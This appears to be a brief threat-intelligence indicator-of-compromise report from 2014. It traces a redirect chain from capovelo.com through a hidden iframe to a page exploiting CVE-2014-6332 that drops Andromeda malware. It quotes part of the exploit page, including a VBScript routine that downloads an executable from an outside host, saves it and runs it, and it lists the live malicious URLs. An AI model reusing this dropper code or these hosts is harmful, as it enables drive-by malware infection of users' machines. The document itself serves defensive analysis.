IOC - capovelo.com - 2014-12-18

// IOC - capovelo.com - 2014-12-18

// Visiting 'capovelo.com' might initiate a redirect chain that ends up on a website hosting CVE-2014-6332 exploit. Successful exploitation leads to downloading a variant of Andromeda malware - https://www.virustotal.com/en/file/6cc32beb7932f50e143033d7b50e4d278636510b6f186c863492296b6feb134a/analysis/


// Redirect chain can be triggered by visiting - http://capovelo.com/community/page/index.html/_/articles/frontpage/thomas-weisel-responds-to-lance-armstrongs-r271

// The returned page contains the following <iframe>:

<iframe src="http://www.beyondrealitypack.com/Forums/uploads/monthly_12_2013/index.php?out=1418488864" width="1" height="1" frameborder="0"></iframe>

// When requested it returns 302 pointing at - http://fabesinternational.com/wp-content/plugins/wp_module/iee.php

// 'iee.php' contains exploit code for CVE-2014-6332. See partial example of the code:

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<body>
    <SCRIPT LANGUAGE="VBScript">
        function runmumaa()
        On Error Resume Next
        Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
        oXMLHTTP.Open "GET", "http://fabesinternational.com/wp-content/plugins/wp_module/calc.exe", 0
        oXMLHTTP.Send
        Set oADOStream = CreateObject("ADODB.Stream")
        oADOStream.Mode = 3 '?????????? ?? ?????? ? ??????
        oADOStream.Type = 1 '??? ?????? - Binary
        oADOStream.Open
        oADOStream.Write oXMLHTTP.responseBody
        oADOStream.SaveToFile "cal.exe", 2
        set shell = createobject("Shell.Application")
        shell.ShellExecute "cal.exe"
        end
        function
    </script>

    <SCRIPT LANGUAGE="VBScript">
        dim aa()
        dim ab()
        dim a0